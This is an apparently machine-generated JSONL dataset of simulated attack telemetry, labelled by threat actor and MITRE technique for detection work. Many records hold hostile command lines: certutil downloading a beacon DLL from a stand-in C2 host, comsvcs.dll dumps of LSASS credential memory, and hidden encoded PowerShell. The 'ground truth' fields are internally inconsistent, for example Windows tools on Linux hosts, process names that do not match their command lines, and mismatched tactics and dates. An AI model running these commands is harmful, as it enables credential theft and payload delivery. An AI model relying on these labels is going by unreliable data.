text
stringlengths
1.13k
1.33k
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Impact"],"technique_id":"T1531"},"event_id":"evt_lapsus_20261126T132552000Z_0019601","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.109.64.143","name":"APP-WEB-7TBUEVO7V9","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19601Lapsus$T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.73.104.238","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-14T07:40:26.000Z","user":{"name":"arn:aws:iam::tg2f6rbp52ct","sid":"S-1-5-21-223593617-701335908-5013"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20251124T220858000Z_0019603","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.228.52.138","name":"EC2-INST-D520ZJP0L3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19603APT29T1566.001"},"network":{"domain":"github.com","dst_ip":"1.44.147.186","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-03T14:03:42.000Z","user":{"name":"i-osq41h69ox7q","sid":"S-1-5-21-984143573-374209497-9111"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection","Credential Access","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260802T161241000Z_0019605","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.14.44.110","name":"APP-WEB-GPOUG1M3PF","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19605APT29T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.82.98.142","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-07T17:35:44.000Z","user":{"name":"arn:aws:iam::1zua2piuh10f","sid":"S-1-5-21-760908818-375628609-7076"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Persistence","Lateral Movement","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20251124T151823000Z_0019607","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.222.243.119","name":"DB-ORACLE-RKSP1MUCQN","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19607UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.141.199.218","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 765 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-12T08:15:15.000Z","user":{"name":"i-mtkj978xznt9","sid":"S-1-5-21-890537584-532918359-5794"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20261116T162250000Z_0019609","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.35.216.42","name":"EC2-INST-7K7VG00341","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19609APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.184.12.92","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3747 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-30T16:30:25.000Z","user":{"name":"azuread\\rp1ocglkyjb9","sid":"S-1-5-21-166822985-561922018-2350"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20250910T001726000Z_0019611","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.74.65.40","name":"AZURE-VM-U7DPSF5XAE","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19611APT29T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.141.68.209","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3581 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-02T15:48:18.000Z","user":{"name":"svc_4y4938tosgk6","sid":"S-1-5-21-670442053-623656340-3267"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation","Impact"],"technique_id":"T1570"},"event_id":"evt_fin7_20260909T011237000Z_0019613","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.98.65.149","name":"DB-ORACLE-XQ3QPZ2MDF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19613FIN7T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.153.40.215","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-04-14T07:16:08.000Z","user":{"name":"CORP\\5qyxf4z6928m","sid":"S-1-5-21-689584082-648193867-1799"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260826T012149000Z_0019615","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.242.231.206","name":"AZURE-VM-7YCXAFUVF9","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19615Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.40.100.153","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-13T03:15:59.000Z","user":{"name":"svc_832pdjra7ibx","sid":"S-1-5-21-389799073-505546843-9806"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Collection"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20251106T085727000Z_0019617","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.166.155.150","name":"DB-ORACLE-1ESNYGUOQX","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19617APT41T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.21.101.215","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 661 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-13T06:10:02.000Z","user":{"name":"svc_g79m5zy78wx9","sid":"S-1-5-21-157408485-362754937-8380"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Defense Evasion","Execution"],"technique_id":"T1570"},"event_id":"evt_apt29_20250127T203210000Z_0019619","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.134.18.81","name":"AZURE-VM-00STUHPX7T","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19619APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.181.168.14","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1490 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-04-27T19:20:14.000Z","user":{"name":"CORP\\sj8cysu26zb6","sid":"S-1-5-21-198094952-465225915-5495"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260406T222418000Z_0019621","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.60.251.127","name":"WIN-FIN-SRV-IPQPWKNRDD","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19621APT41T1484.001"},"network":{"domain":"github.com","dst_ip":"1.111.188.129","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-05-30T13:56:16.000Z","user":{"name":"azuread\\d6jo34zeydv9","sid":"S-1-5-21-364959067-835437938-4895"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Discovery","Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260225T075843000Z_0019623","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.184.217.86","name":"APP-WEB-U7BTVMNBYK","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19623Scattered SpiderT1021.006"},"network":{"domain":"github.com","dst_ip":"1.100.74.167","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 932 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-26T09:22:58.000Z","user":{"name":"i-o4c5vs2wt10z","sid":"S-1-5-21-170914819-936297845-1799"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion","Impact","Lateral Movement"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250714T152222000Z_0019625","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.237.10.188","name":"DB-ORACLE-9S5WN9HW88","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19625Volt TyphoonT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.49.118.154","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-06-26T22:16:12.000Z","user":{"name":"CORP\\47onztj197dc","sid":"S-1-5-21-734928814-289094302-7255"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Lateral Movement","Privilege Escalation","Collection"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20250203T192554000Z_0019627","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.179.132.72","name":"IAM-ROLE-3FLLYMP03A","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19627Volt TyphoonT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.65.5.135","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2149 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-06-08T20:39:53.000Z","user":{"name":"svc_mz12znmmm5vs","sid":"S-1-5-21-654124082-231796581-1729"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Impact"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20250927T142049000Z_0019629","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.255.251.77","name":"EC2-INST-J3SN8SK9S1","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19629UNC4841T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.137.118.128","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-09T15:25:25.000Z","user":{"name":"CORP\\n50u2l8ik702","sid":"S-1-5-21-985080826-687546226-1957"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Credential Access","Privilege Escalation"],"technique_id":"T1531"},"event_id":"evt_unc4841_20250212T033038000Z_0019631","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.50.102.50","name":"DB-ORACLE-AMFVJBDNMZ","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19631UNC4841T1531"},"network":{"domain":"github.com","dst_ip":"1.143.26.222","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2717 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-28T13:56:21.000Z","user":{"name":"CORP\\lpxfr5mkj4le","sid":"S-1-5-21-552155243-658248344-8949"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration","Execution","Collection"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20250116T085809000Z_0019633","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.85.33.182","name":"IAM-ROLE-4R5WOZVD2G","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19633Mustang PandaT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.187.219.182","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-09-01T23:06:02.000Z","user":{"name":"i-h19gzw5avdcq","sid":"S-1-5-21-520717431-762588089-3170"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Persistence","Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20261225T045546000Z_0019635","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.179.232.240","name":"DB-ORACLE-F6LSEC1Y46","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19635Lapsus$T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.61.123.169","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-04-15T09:28:43.000Z","user":{"name":"i-xw6mzwr0y3oq","sid":"S-1-5-21-250013897-851909564-5797"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Reconnaissance","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20260110T115139000Z_0019637","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.108.188.109","name":"AZURE-VM-U0FR4QETY1","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19637APT41T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.133.136.66","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-23T21:41:24.000Z","user":{"name":"CORP\\qosl8i8z04ah","sid":"S-1-5-21-793138436-285136588-2995"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Lateral Movement","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20261005T014533000Z_0019639","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.27.227.83","name":"APP-WEB-RZCLZR5GKZ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19639APT41T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.60.45.11","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-07-09T22:56:54.000Z","user":{"name":"i-yq0nd8fzhawb","sid":"S-1-5-21-742648681-316916521-2396"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20261117T144243000Z_0019641","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.163.212.235","name":"APP-WEB-ENVJ1P6IVS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19641APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.10.172.112","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-02T11:55:07.000Z","user":{"name":"i-s1i3mqzr71s2","sid":"S-1-5-21-758824589-553096443-8043"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20260606T145554000Z_0019643","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.17.172.91","name":"EC2-INST-MYL0NRNNQE","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19643APT41T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.85.24.227","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 529 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-02T14:48:47.000Z","user":{"name":"i-6qcxrz8zdlx7","sid":"S-1-5-21-146569984-791676211-6846"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20260930T164339000Z_0019645","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.175.168.189","name":"IAM-ROLE-F5SIPRUTC5","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19645Lapsus$T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.150.188.202","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-08-11T16:36:15.000Z","user":{"name":"azuread\\oj7ynbcwb0ep","sid":"S-1-5-21-878388048-878303012-4019"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Execution","Command and Control"],"technique_id":"T1570"},"event_id":"evt_unc4841_20250316T192107000Z_0019647","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.254.211.224","name":"IAM-ROLE-FKXY9QTYFY","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19647UNC4841T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.30.97.210","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2790 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-09-25T08:13:19.000Z","user":{"name":"svc_szfznli6h1gd","sid":"S-1-5-21-985236465-620915858-3437"}}
